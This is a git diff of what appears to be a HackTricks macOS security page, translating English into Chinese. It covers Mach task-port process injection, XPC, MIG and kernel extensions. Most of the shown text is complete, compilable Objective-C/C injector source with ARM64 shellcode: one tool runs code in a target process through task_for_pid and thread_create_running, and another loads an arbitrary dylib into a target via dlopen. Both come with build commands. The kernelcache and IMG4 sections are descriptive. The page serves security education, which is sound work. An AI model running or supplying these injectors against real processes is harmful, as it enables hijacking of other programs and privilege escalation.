2); // this is the real stack +//remoteStack64 -= 8; // need alignment of 16 - const char* p = (const char*) remoteCode64; +const char* p = (const char*) remoteCode64; - remoteThreadState64.ash.flavor = ARM_THREAD_STATE64; - remoteThreadState64.ash.count = ARM_THREAD_STATE64_COUNT; - remoteThreadState64.ts_64.__pc = (u_int64_t) remoteCode64; - remoteThreadState64.ts_64.__sp = (u_int64_t) remoteStack64; +remoteThreadState64.ash.flavor = ARM_THREAD_STATE64; +remoteThreadState64.ash.count = ARM_THREAD_STATE64_COUNT; +remoteThreadState64.ts_64.__pc = (u_int64_t) remoteCode64; +remoteThreadState64.ts_64.__sp = (u_int64_t) remoteStack64; - printf ("Remote Stack 64 0x%llx, Remote code is %p\n", remoteStack64, p ); +printf ("Remote Stack 64 0x%llx, Remote code is %p\n", remoteStack64, p ); - kr = thread_create_running(remoteTask, ARM_THREAD_STATE64, // ARM_THREAD_STATE64, - (thread_state_t) &remoteThreadState64.ts_64, ARM_THREAD_STATE64_COUNT , &remoteThread ); +kr = thread_create_running(remoteTask, ARM_THREAD_STATE64, // ARM_THREAD_STATE64, +(thread_state_t) &remoteThreadState64.ts_64, ARM_THREAD_STATE64_COUNT , &remoteThread ); - if (kr != KERN_SUCCESS) { - fprintf(stderr,"Unable to create remote thread: error %s", mach_error_string (kr)); - return (-3); - } +if (kr != KERN_SUCCESS) { +fprintf(stderr,"Unable to create remote thread: error %s", mach_error_string (kr)); +return (-3); +} - return (0); +return (0); } pid_t pidForProcessName(NSString *processName) { - NSArray *arguments = @[@"pgrep", processName]; - NSTask *task = [[NSTask alloc] init]; - [task setLaunchPath:@"/usr/bin/env"]; - [task setArguments:arguments]; +NSArray *arguments = @[@"pgrep", processName]; +NSTask *task = [[NSTask alloc] init]; +[task setLaunchPath:@"/usr/bin/env"]; +[task setArguments:arguments]; - NSPipe *pipe = [NSPipe pipe]; - [task setStandardOutput:pipe]; +NSPipe *pipe = [NSPipe pipe]; +[task setStandardOutput:pipe]; - NSFileHandle *file = [pipe fileHandleForReading]; +NSFileHandle *file = [pipe fileHandleForReading]; - [task launch]; +[task launch]; - NSData *data = [file readDataToEndOfFile]; - NSString *string = [[NSString alloc] initWithData:data encoding:NSUTF8StringEncoding]; +NSData *data = [file readDataToEndOfFile]; +NSString *string = [[NSString alloc] initWithData:data encoding:NSUTF8StringEncoding]; - return (pid_t)[string integerValue]; +return (pid_t)[string integerValue]; } BOOL isStringNumeric(NSString *str) { - NSCharacterSet* nonNumbers = [[NSCharacterSet decimalDigitCharacterSet] invertedSet]; - NSRange r = [str rangeOfCharacterFromSet: nonNumbers]; - return r.location == NSNotFound; +NSCharacterSet* nonNumbers = [[NSCharacterSet decimalDigitCharacterSet] invertedSet]; +NSRange r = [str rangeOfCharacterFromSet: nonNumbers]; +return r.location == NSNotFound; } int main(int argc, const char * argv[]) { - @autoreleasepool { - if (argc < 2) { - NSLog(@"Usage: %s ", argv[0]); - return 1; - } +@autoreleasepool { +if (argc < 2) { +NSLog(@"Usage: %s ", argv[0]); +return 1; +} - NSString *arg = [NSString stringWithUTF8String:argv[1]]; - pid_t pid; +NSString *arg = [NSString stringWithUTF8String:argv[1]]; +pid_t pid; - if (isStringNumeric(arg)) { - pid = [arg intValue]; - } else { - pid = pidForProcessName(arg); - if (pid == 0) { - NSLog(@"Error: Process named '%@' not found.", arg); - return 1; - } - else{ - printf("Found PID of process '%s': %d\n", [arg UTF8String], pid); - } - } +if (isStringNumeric(arg)) { +pid = [arg intValue]; +} else { +pid = pidForProcessName(arg); +if (pid == 0) { +NSLog(@"Error: Process named '%@' not found.", arg); +return 1; +} +else{ +printf("Found PID of process '%s': %d\n", [arg UTF8String], pid); +} +} - inject(pid); - } +inject(pid); +} - return 0; +return 0; } ``` -
- ```bash gcc -framework Foundation -framework Appkit sc_inject.m -o sc_inject ./inject ``` +### 通过任务端口在线程中注入Dylib -### Dylib Injection in thread via Task port +在macOS中,**线程**可以通过**Mach**或使用**posix `pthread` api**进行操作。我们在之前的注入中生成的线程是使用Mach api生成的,因此**它不符合posix标准**。 -In macOS **threads** might be manipulated via **Mach** or using **posix `pthread` api**. The thread we generated in the previous injection, was generated using Mach api, so **it's not posix compliant**. +能够**注入一个简单的shellcode**来执行命令是因为它**不需要与posix**兼容的api,只需与Mach兼容。**更复杂的注入**将需要**线程**也**符合posix标准**。 -It was possible to **inject a simple shellcode** to execute a command because it **didn't need to work with posix** compliant apis, only with Mach. **More complex injections** would need the **thread** to be also **posix compliant**. +因此,为了**改进线程**,它应该调用**`pthread_create_from_mach_thread`**,这将**创建一个有效的pthread**。然后,这个新的pthread可以**调用dlopen**来**从系统加载一个dylib**,因此不必编写新的shellcode来执行不同的操作,而是可以加载自定义库。 -Therefore, to **improve the thread** it should call **`pthread_create_from_mach_thread`** which will **create a valid pthread**. Then, this new pthread could **call dlopen** to **load a dylib** from the system, so instead of writing new shellcode to perform different actions it's possible to load custom libraries. - -You can find **example dylibs** in (for example the one that generates a log and then you can listen to it): +您可以在以下位置找到**示例dylibs**(例如,生成日志的那个,然后您可以监听它): {{#ref}} ../../macos-dyld-hijacking-and-dyld_insert_libraries.md @@ -531,7 +515,6 @@ You can find **example dylibs** in (for example the one that generates a log and
dylib_injector.m - ```objectivec // gcc -framework Foundation -framework Appkit dylib_injector.m -o dylib_injector // Based on http://newosxbook.com/src.jl?tree=listings&file=inject.c @@ -557,18 +540,18 @@ You can find **example dylibs** in (for example the one that generates a log and // And I say, bullshit. kern_return_t mach_vm_allocate ( - vm_map_t target, - mach_vm_address_t *address, - mach_vm_size_t size, - int flags +vm_map_t target, +mach_vm_address_t *address, +mach_vm_size_t size, +int flags ); kern_return_t mach_vm_write ( - vm_map_t target_task, - mach_vm_address_t address, - vm_offset_t data, - mach_msg_type_number_t dataCnt +vm_map_t target_task, +mach_vm_address_t address, +vm_offset_t data, +mach_msg_type_number_t dataCnt ); @@ -583,236 +566,233 @@ kern_return_t mach_vm_write char injectedCode[] = - // "\x00\x00\x20\xd4" // BRK X0 ; // useful if you need a break :) +// "\x00\x00\x20\xd4" // BRK X0 ; // useful if you need a break :) - // Call pthread_set_self +// Call pthread_set_self - "\xff\x83\x00\xd1" // SUB SP, SP, #0x20 ; Allocate 32 bytes of space on the stack for local variables - "\xFD\x7B\x01\xA9" // STP X29, X30, [SP, #0x10] ; Save frame pointer and link register on the stack - "\xFD\x43\x00\x91" // ADD X29, SP, #0x10 ; Set frame pointer to current stack pointer - "\xff\x43\x00\xd1" // SUB SP, SP, #0x10 ; Space for the - "\xE0\x03\x00\x91" // MOV X0, SP ; (arg0)Store in the stack the thread struct - "\x01\x00\x80\xd2" // MOVZ X1, 0 ; X1 (arg1) = 0; - "\xA2\x00\x00\x10" // ADR X2, 0x14 ; (arg2)12bytes from here, Address where the new thread should start - "\x03\x00\x80\xd2" // MOVZ X3, 0 ; X3 (arg3) = 0; - "\x68\x01\x00\x58" // LDR X8, #44 ; load address of PTHRDCRT (pthread_create_from_mach_thread) - "\x00\x01\x3f\xd6" // BLR X8 ; call pthread_create_from_mach_thread - "\x00\x00\x00\x14" // loop: b loop ; loop forever +"\xff\x83\x00\xd1" // SUB SP, SP, #0x20 ; Allocate 32 bytes of space on the stack for local variables +"\xFD\x7B\x01\xA9" // STP X29, X30, [SP, #0x10] ; Save frame pointer and link register on the stack +"\xFD\x43\x00\x91" // ADD X29, SP, #0x10 ; Set frame pointer to current stack pointer +"\xff\x43\x00\xd1" // SUB SP, SP, #0x10 ; Space for the +"\xE0\x03\x00\x91" // MOV X0, SP ; (arg0)Store in the stack the thread struct +"\x01\x00\x80\xd2" // MOVZ X1, 0 ; X1 (arg1) = 0; +"\xA2\x00\x00\x10" // ADR X2, 0x14 ; (arg2)12bytes from here, Address where the new thread should start +"\x03\x00\x80\xd2" // MOVZ X3, 0 ; X3 (arg3) = 0; +"\x68\x01\x00\x58" // LDR X8, #44 ; load address of PTHRDCRT (pthread_create_from_mach_thread) +"\x00\x01\x3f\xd6" // BLR X8 ; call pthread_create_from_mach_thread +"\x00\x00\x00\x14" // loop: b loop ; loop forever - // Call dlopen with the path to the library - "\xC0\x01\x00\x10" // ADR X0, #56 ; X0 => "LIBLIBLIB..."; - "\x68\x01\x00\x58" // LDR X8, #44 ; load DLOPEN - "\x01\x00\x80\xd2" // MOVZ X1, 0 ; X1 = 0; - "\x29\x01\x00\x91" // ADD x9, x9, 0 - I left this as a nop - "\x00\x01\x3f\xd6" // BLR X8 ; do dlopen() +// Call dlopen with the path to the library +"\xC0\x01\x00\x10" // ADR X0, #56 ; X0 => "LIBLIBLIB..."; +"\x68\x01\x00\x58" // LDR X8, #44 ; load DLOPEN +"\x01\x00\x80\xd2" // MOVZ X1, 0 ; X1 = 0; +"\x29\x01\x00\x91" // ADD x9, x9, 0 - I left this as a nop +"\x00\x01\x3f\xd6" // BLR X8 ; do dlopen() - // Call pthread_exit - "\xA8\x00\x00\x58" // LDR X8, #20 ; load PTHREADEXT - "\x00\x00\x80\xd2" // MOVZ X0, 0 ; X1 = 0; - "\x00\x01\x3f\xd6" // BLR X8 ; do pthread_exit +// Call pthread_exit +"\xA8\x00\x00\x58" // LDR X8, #20 ; load PTHREADEXT +"\x00\x00\x80\xd2" // MOVZ X0, 0 ; X1 = 0; +"\x00\x01\x3f\xd6" // BLR X8 ; do pthread_exit - "PTHRDCRT" // <- - "PTHRDEXT" // <- - "DLOPEN__" // <- - "LIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIB" - "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" - "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" - "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" - "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" - "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" ; +"PTHRDCRT" // <- +"PTHRDEXT" // <- +"DLOPEN__" // <- +"LIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIBLIB" +"\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" +"\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" +"\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" +"\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" +"\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" "\x00" ; int inject(pid_t pid, const char *lib) { - task_t remoteTask; - struct stat buf; +task_t remoteTask; +struct stat buf; - // Check if the library exists - int rc = stat (lib, &buf); +// Check if the library exists +int rc = stat (lib, &buf); - if (rc != 0) - { - fprintf (stderr, "Unable to open library file %s (%s) - Cannot inject\n", lib,strerror (errno)); - //return (-9); - } +if (rc != 0) +{ +fprintf (stderr, "Unable to open library file %s (%s) - Cannot inject\n", lib,strerror (errno)); +//return (-9); +} - // Get access to the task port of the process we want to inject into - kern_return_t kr = task_for_pid(mach_task_self(), pid, &remoteTask); - if (kr != KERN_SUCCESS) { - fprintf (stderr, "Unable to call task_for_pid on pid %d: %d. Cannot continue!\n",pid, kr); - return (-1); - } - else{ - printf("Gathered privileges over the task port of process: %d\n", pid); - } +// Get access to the task port of the process we want to inject into +kern_return_t kr = task_for_pid(mach_task_self(), pid, &remoteTask); +if (kr != KERN_SUCCESS) { +fprintf (stderr, "Unable to call task_for_pid on pid %d: %d. Cannot continue!\n",pid, kr); +return (-1); +} +else{ +printf("Gathered privileges over the task port of process: %d\n", pid); +} - // Allocate memory for the stack - mach_vm_address_t remoteStack64 = (vm_address_t) NULL; - mach_vm_address_t remoteCode64 = (vm_address_t) NULL; - kr = mach_vm_allocate(remoteTask, &remoteStack64, STACK_SIZE, VM_FLAGS_ANYWHERE); +// Allocate memory for the stack +mach_vm_address_t remoteStack64 = (vm_address_t) NULL; +mach_vm_address_t remoteCode64 = (vm_address_t) NULL; +kr = mach_vm_allocate(remoteTask, &remoteStack64, STACK_SIZE, VM_FLAGS_ANYWHERE); - if (kr != KERN_SUCCESS) - { - fprintf(stderr,"Unable to allocate memory for remote stack in thread: Error %s\n", mach_error_string(kr)); - return (-2); - } - else - { +if (kr != KERN_SUCCESS) +{ +fprintf(stderr,"Unable to allocate memory for remote stack in thread: Error %s\n", mach_error_string(kr)); +return (-2); +} +else +{ - fprintf (stderr, "Allocated remote stack @0x%llx\n", remoteStack64); - } +fprintf (stderr, "Allocated remote stack @0x%llx\n", remoteStack64); +} - // Allocate memory for the code - remoteCode64 = (vm_address_t) NULL; - kr = mach_vm_allocate( remoteTask, &remoteCode64, CODE_SIZE, VM_FLAGS_ANYWHERE ); +// Allocate memory for the code +remoteCode64 = (vm_address_t) NULL; +kr = mach_vm_allocate( remoteTask, &remoteCode64, CODE_SIZE, VM_FLAGS_ANYWHERE ); - if (kr != KERN_SUCCESS) - { - fprintf(stderr,"Unable to allocate memory for remote code in thread: Error %s\n", mach_error_string(kr)); - return (-2); - } +if (kr != KERN_SUCCESS) +{ +fprintf(stderr,"Unable to allocate memory for remote code in thread: Error %s\n", mach_error_string(kr)); +return (-2); +} - // Patch shellcode +// Patch shellcode - int i = 0; - char *possiblePatchLocation = (injectedCode ); - for (i = 0 ; i < 0x100; i++) - { +int i = 0; +char *possiblePatchLocation = (injectedCode ); +for (i = 0 ; i < 0x100; i++) +{ - // Patching is crude, but works. - // - extern void *_pthread_set_self; - possiblePatchLocation++; +// Patching is crude, but works. +// +extern void *_pthread_set_self; +possiblePatchLocation++; - uint64_t addrOfPthreadCreate = dlsym ( RTLD_DEFAULT, "pthread_create_from_mach_thread"); //(uint64_t) pthread_create_from_mach_thread; - uint64_t addrOfPthreadExit = dlsym (RTLD_DEFAULT, "pthread_exit"); //(uint64_t) pthread_exit; - uint64_t addrOfDlopen = (uint64_t) dlopen; +uint64_t addrOfPthreadCreate = dlsym ( RTLD_DEFAULT, "pthread_create_from_mach_thread"); //(uint64_t) pthread_create_from_mach_thread; +uint64_t addrOfPthreadExit = dlsym (RTLD_DEFAULT, "pthread_exit"); //(uint64_t) pthread_exit; +uint64_t addrOfDlopen = (uint64_t) dlopen; - if (memcmp (possiblePatchLocation, "PTHRDEXT", 8) == 0) - { - memcpy(possiblePatchLocation, &addrOfPthreadExit,8); - printf ("Pthread exit @%llx, %llx\n", addrOfPthreadExit, pthread_exit); - } +if (memcmp (possiblePatchLocation, "PTHRDEXT", 8) == 0) +{ +memcpy(possiblePatchLocation, &addrOfPthreadExit,8); +printf ("Pthread exit @%llx, %llx\n", addrOfPthreadExit, pthread_exit); +} - if (memcmp (possiblePatchLocation, "PTHRDCRT", 8) == 0) - { - memcpy(possiblePatchLocation, &addrOfPthreadCreate,8); - printf ("Pthread create from mach thread @%llx\n", addrOfPthreadCreate); - } +if (memcmp (possiblePatchLocation, "PTHRDCRT", 8) == 0) +{ +memcpy(possiblePatchLocation, &addrOfPthreadCreate,8); +printf ("Pthread create from mach thread @%llx\n", addrOfPthreadCreate); +} - if (memcmp(possiblePatchLocation, "DLOPEN__", 6) == 0) - { - printf ("DLOpen @%llx\n", addrOfDlopen); - memcpy(possiblePatchLocation, &addrOfDlopen, sizeof(uint64_t)); - } +if (memcmp(possiblePatchLocation, "DLOPEN__", 6) == 0) +{ +printf ("DLOpen @%llx\n", addrOfDlopen); +memcpy(possiblePatchLocation, &addrOfDlopen, sizeof(uint64_t)); +} - if (memcmp(possiblePatchLocation, "LIBLIBLIB", 9) == 0) - { - strcpy(possiblePatchLocation, lib ); - } - } +if (memcmp(possiblePatchLocation, "LIBLIBLIB", 9) == 0) +{ +strcpy(possiblePatchLocation, lib ); +} +} - // Write the shellcode to the allocated memory - kr = mach_vm_write(remoteTask, // Task port - remoteCode64, // Virtual Address (Destination) - (vm_address_t) injectedCode, // Source - 0xa9); // Length of the source +// Write the shellcode to the allocated memory +kr = mach_vm_write(remoteTask, // Task port +remoteCode64, // Virtual Address (Destination) +(vm_address_t) injectedCode, // Source +0xa9); // Length of the source - if (kr != KERN_SUCCESS) - { - fprintf(stderr,"Unable to write remote thread memory: Error %s\n", mach_error_string(kr)); - return (-3); - } +if (kr != KERN_SUCCESS) +{ +fprintf(stderr,"Unable to write remote thread memory: Error %s\n", mach_error_string(kr)); +return (-3); +} - // Set the permissions on the allocated code memory - kr = vm_protect(remoteTask, remoteCode64, 0x70, FALSE, VM_PROT_READ | VM_PROT_EXECUTE); +// Set the permissions on the allocated code memory +kr = vm_protect(remoteTask, remoteCode64, 0x70, FALSE, VM_PROT_READ | VM_PROT_EXECUTE); - if (kr != KERN_SUCCESS) - { - fprintf(stderr,"Unable to set memory permissions for remote thread's code: Error %s\n", mach_error_string(kr)); - return (-4); - } +if (kr != KERN_SUCCESS) +{ +fprintf(stderr,"Unable to set memory permissions for remote thread's code: Error %s\n", mach_error_string(kr)); +return (-4); +} - // Set the permissions on the allocated stack memory - kr = vm_protect(remoteTask, remoteStack64, STACK_SIZE, TRUE, VM_PROT_READ | VM_PROT_WRITE); +// Set the permissions on the allocated stack memory +kr = vm_protect(remoteTask, remoteStack64, STACK_SIZE, TRUE, VM_PROT_READ | VM_PROT_WRITE); - if (kr != KERN_SUCCESS) - { - fprintf(stderr,"Unable to set memory permissions for remote thread's stack: Error %s\n", mach_error_string(kr)); - return (-4); - } +if (kr != KERN_SUCCESS) +{ +fprintf(stderr,"Unable to set memory permissions for remote thread's stack: Error %s\n", mach_error_string(kr)); +return (-4); +} - // Create thread to run shellcode - struct arm_unified_thread_state remoteThreadState64; - thread_act_t remoteThread; +// Create thread to run shellcode +struct arm_unified_thread_state remoteThreadState64; +thread_act_t remoteThread; - memset(&remoteThreadState64, '\0', sizeof(remoteThreadState64) ); +memset(&remoteThreadState64, '\0', sizeof(remoteThreadState64) ); - remoteStack64 += (STACK_SIZE / 2); // this is the real stack - //remoteStack64 -= 8; // need alignment of 16 +remoteStack64 += (STACK_SIZE / 2); // this is the real stack +//remoteStack64 -= 8; // need alignment of 16 - const char* p = (const char*) remoteCode64; +const char* p = (const char*) remoteCode64; - remoteThreadState64.ash.flavor = ARM_THREAD_STATE64; - remoteThreadState64.ash.count = ARM_THREAD_STATE64_COUNT; - remoteThreadState64.ts_64.__pc = (u_int64_t) remoteCode64; - remoteThreadState64.ts_64.__sp = (u_int64_t) remoteStack64; +remoteThreadState64.ash.flavor = ARM_THREAD_STATE64; +remoteThreadState64.ash.count = ARM_THREAD_STATE64_COUNT; +remoteThreadState64.ts_64.__pc = (u_int64_t) remoteCode64; +remoteThreadState64.ts_64.__sp = (u_int64_t) remoteStack64; - printf ("Remote Stack 64 0x%llx, Remote code is %p\n", remoteStack64, p ); +printf ("Remote Stack 64 0x%llx, Remote code is %p\n", remoteStack64, p ); - kr = thread_create_running(remoteTask, ARM_THREAD_STATE64, // ARM_THREAD_STATE64, - (thread_state_t) &remoteThreadState64.ts_64, ARM_THREAD_STATE64_COUNT , &remoteThread ); +kr = thread_create_running(remoteTask, ARM_THREAD_STATE64, // ARM_THREAD_STATE64, +(thread_state_t) &remoteThreadState64.ts_64, ARM_THREAD_STATE64_COUNT , &remoteThread ); - if (kr != KERN_SUCCESS) { - fprintf(stderr,"Unable to create remote thread: error %s", mach_error_string (kr)); - return (-3); - } +if (kr != KERN_SUCCESS) { +fprintf(stderr,"Unable to create remote thread: error %s", mach_error_string (kr)); +return (-3); +} - return (0); +return (0); } int main(int argc, const char * argv[]) { - if (argc < 3) - { - fprintf (stderr, "Usage: %s _pid_ _action_\n", argv[0]); - fprintf (stderr, " _action_: path to a dylib on disk\n"); - exit(0); - } +if (argc < 3) +{ +fprintf (stderr, "Usage: %s _pid_ _action_\n", argv[0]); +fprintf (stderr, " _action_: path to a dylib on disk\n"); +exit(0); +} - pid_t pid = atoi(argv[1]); - const char *action = argv[2]; - struct stat buf; +pid_t pid = atoi(argv[1]); +const char *action = argv[2]; +struct stat buf; - int rc = stat (action, &buf); - if (rc == 0) inject(pid,action); - else - { - fprintf(stderr,"Dylib not found\n"); - } +int rc = stat (action, &buf); +if (rc == 0) inject(pid,action); +else +{ +fprintf(stderr,"Dylib not found\n"); +} } ``` -
- ```bash gcc -framework Foundation -framework Appkit dylib_injector.m -o dylib_injector ./inject ``` +### 通过任务端口的线程劫持 -### Thread Hijacking via Task port - -In this technique a thread of the process is hijacked: +在此技术中,进程的一个线程被劫持: {{#ref}} ../../macos-proces-abuse/macos-ipc-inter-process-communication/macos-thread-injection-via-task-port.md @@ -820,27 +800,27 @@ In this technique a thread of the process is hijacked: ## XPC -### Basic Information +### 基本信息 -XPC, which stands for XNU (the kernel used by macOS) inter-Process Communication, is a framework for **communication between processes** on macOS and iOS. XPC provides a mechanism for making **safe, asynchronous method calls between different processes** on the system. It's a part of Apple's security paradigm, allowing for the **creation of privilege-separated applications** where each **component** runs with **only the permissions it needs** to do its job, thereby limiting the potential damage from a compromised process. +XPC,即 XNU(macOS 使用的内核)进程间通信,是一个用于 **macOS 和 iOS 上进程之间通信** 的框架。XPC 提供了一种机制,用于在系统上进行 **安全的、异步的方法调用**。它是苹果安全范式的一部分,允许 **创建特权分离的应用程序**,每个 **组件** 仅以 **执行其工作所需的权限** 运行,从而限制被攻陷进程可能造成的损害。 -For more information about how this **communication work** on how it **could be vulnerable** check: +有关此 **通信如何工作** 以及 **可能存在的漏洞** 的更多信息,请查看: {{#ref}} ../../macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/ {{#endref}} -## MIG - Mach Interface Generator +## MIG - Mach 接口生成器 -MIG was created to **simplify the process of Mach IPC** code creation. It basically **generates the needed code** for server and client to communicate with a given definition. Even if the generated code is ugly, a developer will just need to import it and his code will be much simpler than before. +MIG 的创建旨在 **简化 Mach IPC** 代码的生成过程。它基本上 **生成所需的代码** 以便服务器和客户端根据给定定义进行通信。即使生成的代码不美观,开发人员只需导入它,其代码将比之前简单得多。 -For more info check: +有关更多信息,请查看: {{#ref}} ../../macos-proces-abuse/macos-ipc-inter-process-communication/macos-mig-mach-interface-generator.md {{#endref}} -## References +## 参考文献 - [https://docs.darlinghq.org/internals/macos-specifics/mach-ports.html](https://docs.darlinghq.org/internals/macos-specifics/mach-ports.html) - [https://knight.sc/malware/2019/03/15/code-injection-on-macos.html](https://knight.sc/malware/2019/03/15/code-injection-on-macos.html) diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-kernel-extensions.md b/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-kernel-extensions.md index 4258ded90..8ddf17407 100644 --- a/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-kernel-extensions.md +++ b/src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-kernel-extensions.md @@ -1,41 +1,40 @@ -# macOS Kernel Extensions & Debugging +# macOS 内核扩展与调试 {{#include ../../../banners/hacktricks-training.md}} -## Basic Information +## 基本信息 -Kernel extensions (Kexts) are **packages** with a **`.kext`** extension that are **loaded directly into the macOS kernel space**, providing additional functionality to the main operating system. +内核扩展(Kexts)是 **以 `.kext`** 扩展名的 **包**,它们 **直接加载到 macOS 内核空间**,为主操作系统提供额外功能。 -### Requirements +### 要求 -Obviously, this is so powerful that it is **complicated to load a kernel extension**. These are the **requirements** that a kernel extension must meet to be loaded: +显然,这非常强大,以至于 **加载内核扩展** 是 **复杂的**。内核扩展必须满足以下 **要求** 才能被加载: -- When **entering recovery mode**, kernel **extensions must be allowed** to be loaded: +- 当 **进入恢复模式** 时,内核 **扩展必须被允许** 加载:
-- The kernel extension must be **signed with a kernel code signing certificate**, which can only be **granted by Apple**. Who will review in detail the company and the reasons why it is needed. -- The kernel extension must also be **notarized**, Apple will be able to check it for malware. -- Then, the **root** user is the one who can **load the kernel extension** and the files inside the package must **belong to root**. -- During the upload process, the package must be prepared in a **protected non-root location**: `/Library/StagedExtensions` (requires the `com.apple.rootless.storage.KernelExtensionManagement` grant). -- Finally, when attempting to load it, the user will [**receive a confirmation request**](https://developer.apple.com/library/archive/technotes/tn2459/_index.html) and, if accepted, the computer must be **restarted** to load it. +- 内核扩展必须 **使用内核代码签名证书签名**,该证书只能由 **Apple** 授予。谁将详细审查公司及其所需的原因。 +- 内核扩展还必须 **经过公证**,Apple 将能够检查其是否含有恶意软件。 +- 然后,**root** 用户是唯一可以 **加载内核扩展** 的人,包内的文件必须 **属于 root**。 +- 在上传过程中,包必须准备在 **受保护的非 root 位置**:`/Library/StagedExtensions`(需要 `com.apple.rootless.storage.KernelExtensionManagement` 授权)。 +- 最后,当尝试加载时,用户将 [**收到确认请求**](https://developer.apple.com/library/archive/technotes/tn2459/_index.html),如果接受,计算机必须 **重启** 以加载它。 -### Loading process +### 加载过程 -In Catalina it was like this: It is interesting to note that the **verification** process occurs in **userland**. However, only applications with the **`com.apple.private.security.kext-management`** grant can **request the kernel to load an extension**: `kextcache`, `kextload`, `kextutil`, `kextd`, `syspolicyd` +在 Catalina 中是这样的:有趣的是,**验证** 过程发生在 **用户空间**。然而,只有具有 **`com.apple.private.security.kext-management`** 授权的应用程序可以 **请求内核加载扩展**:`kextcache`、`kextload`、`kextutil`、`kextd`、`syspolicyd` -1. **`kextutil`** cli **starts** the **verification** process for loading an extension - - It will talk to **`kextd`** by sending using a **Mach service**. -2. **`kextd`** will check several things, such as the **signature** - - It will talk to **`syspolicyd`** to **check** if the extension can be **loaded**. -3. **`syspolicyd`** will **prompt** the **user** if the extension has not been previously loaded. - - **`syspolicyd`** will report the result to **`kextd`** -4. **`kextd`** will finally be able to **tell the kernel to load** the extension +1. **`kextutil`** cli **启动** 加载扩展的 **验证** 过程 +- 它将通过发送 **Mach 服务** 与 **`kextd`** 进行通信。 +2. **`kextd`** 将检查多个事项,例如 **签名** +- 它将与 **`syspolicyd`** 进行通信以 **检查** 扩展是否可以 **加载**。 +3. **`syspolicyd`** 将 **提示** **用户** 如果扩展尚未被加载。 +- **`syspolicyd`** 将结果报告给 **`kextd`** +4. **`kextd`** 最终将能够 **告诉内核加载** 扩展 -If **`kextd`** is not available, **`kextutil`** can perform the same checks. - -### Enumeration (loaded kexts) +如果 **`kextd`** 不可用,**`kextutil`** 可以执行相同的检查。 +### 枚举(已加载的 kexts) ```bash # Get loaded kernel extensions kextstat @@ -43,40 +42,38 @@ kextstat # Get dependencies of the kext number 22 kextstat | grep " 22 " | cut -c2-5,50- | cut -d '(' -f1 ``` - ## Kernelcache > [!CAUTION] -> Even though the kernel extensions are expected to be in `/System/Library/Extensions/`, if you go to this folder you **won't find any binary**. This is because of the **kernelcache** and in order to reverse one `.kext` you need to find a way to obtain it. +> 尽管内核扩展预计位于 `/System/Library/Extensions/` 中,但如果你去这个文件夹,你 **找不到任何二进制文件**。这是因为 **kernelcache**,为了反向工程一个 `.kext`,你需要找到获取它的方法。 -The **kernelcache** is a **pre-compiled and pre-linked version of the XNU kernel**, along with essential device **drivers** and **kernel extensions**. It's stored in a **compressed** format and gets decompressed into memory during the boot-up process. The kernelcache facilitates a **faster boot time** by having a ready-to-run version of the kernel and crucial drivers available, reducing the time and resources that would otherwise be spent on dynamically loading and linking these components at boot time. +**kernelcache** 是 **XNU 内核的预编译和预链接版本**,以及基本的设备 **驱动程序** 和 **内核扩展**。它以 **压缩** 格式存储,并在启动过程中解压到内存中。kernelcache 通过提供一个准备就绪的内核和关键驱动程序的版本,促进了 **更快的启动时间**,减少了在启动时动态加载和链接这些组件所需的时间和资源。 ### Local Kerlnelcache -In iOS it's located in **`/System/Library/Caches/com.apple.kernelcaches/kernelcache`** in macOS you can find it with: **`find / -name "kernelcache" 2>/dev/null`** \ -In my case in macOS I found it in: +在 iOS 中,它位于 **`/System/Library/Caches/com.apple.kernelcaches/kernelcache`**,在 macOS 中你可以通过以下命令找到它:**`find / -name "kernelcache" 2>/dev/null`** \ +在我的 macOS 中,我找到了它在: - `/System/Volumes/Preboot/1BAEB4B5-180B-4C46-BD53-51152B7D92DA/boot/DAD35E7BC0CDA79634C20BD1BD80678DFB510B2AAD3D25C1228BB34BCD0A711529D3D571C93E29E1D0C1264750FA043F/System/Library/Caches/com.apple.kernelcaches/kernelcache` #### IMG4 -The IMG4 file format is a container format used by Apple in its iOS and macOS devices for securely **storing and verifying firmware** components (like **kernelcache**). The IMG4 format includes a header and several tags which encapsulate different pieces of data including the actual payload (like a kernel or bootloader), a signature, and a set of manifest properties. The format supports cryptographic verification, allowing the device to confirm the authenticity and integrity of the firmware component before executing it. +IMG4 文件格式是 Apple 在其 iOS 和 macOS 设备中用于安全 **存储和验证固件** 组件(如 **kernelcache**)的容器格式。IMG4 格式包括一个头部和多个标签,这些标签封装了不同的数据片段,包括实际的有效载荷(如内核或引导加载程序)、签名和一组清单属性。该格式支持加密验证,允许设备在执行固件组件之前确认其真实性和完整性。 -It's usually composed of the following components: +它通常由以下组件组成: -- **Payload (IM4P)**: - - Often compressed (LZFSE4, LZSS, …) - - Optionally encrypted -- **Manifest (IM4M)**: - - Contains Signature - - Additional Key/Value dictionary -- **Restore Info (IM4R)**: - - Also known as APNonce - - Prevents replaying of some updates - - OPTIONAL: Usually this isn't found - -Decompress the Kernelcache: +- 